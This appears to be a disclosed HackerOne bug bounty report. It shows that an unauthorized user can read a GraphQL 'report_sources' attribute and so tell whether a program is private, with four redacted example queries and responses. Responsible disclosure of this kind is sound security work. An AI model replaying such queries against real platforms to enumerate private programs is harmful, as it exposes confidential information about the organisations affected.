Unauthorized user can obtain `report_sources` attribute through Team GraphQL object

**Summary:** Hi team. And Happy New Year! **Description:** If I am not mistaken, then through this parameter we can define private programs with an external link. If this parameter is not empty, then the program is private. - `["HackerOne Platform"]` ### Steps To Reproduce https://hackerone.com/graphql POST: 1){"query": "query {team(handle:\\"████████\\"){_id,report_sources}}"} `{"data":{"team":{"_id":"██████████","report_sources":[]}}}` - not private program 2){"query": "query {team(handle:\\"███\\"){_id,report_sources}}"} `{"data":{"team":{"_id":"█████","report_sources":["HackerOne Platform"]}}}` - `["HackerOne Platform"]` - private program 3){"query": "query {team(handle:\\"█████████\\"){_id,report_sources}}"} `{"data":{"team":{"_id":"█████████","report_sources":["HackerOne Platform"]}}}` - `["HackerOne Platform"]` - private program 4){"query": "query {team(handle:\\"█████\\"){_id,report_sources}}"} `{"data":{"team":{"_id":"███","report_sources":[]}}}` - not private program Sorry i bad speak english I hope you understand me Thank you,haxta4ok00 ## Impact disclosed of private programs who have external link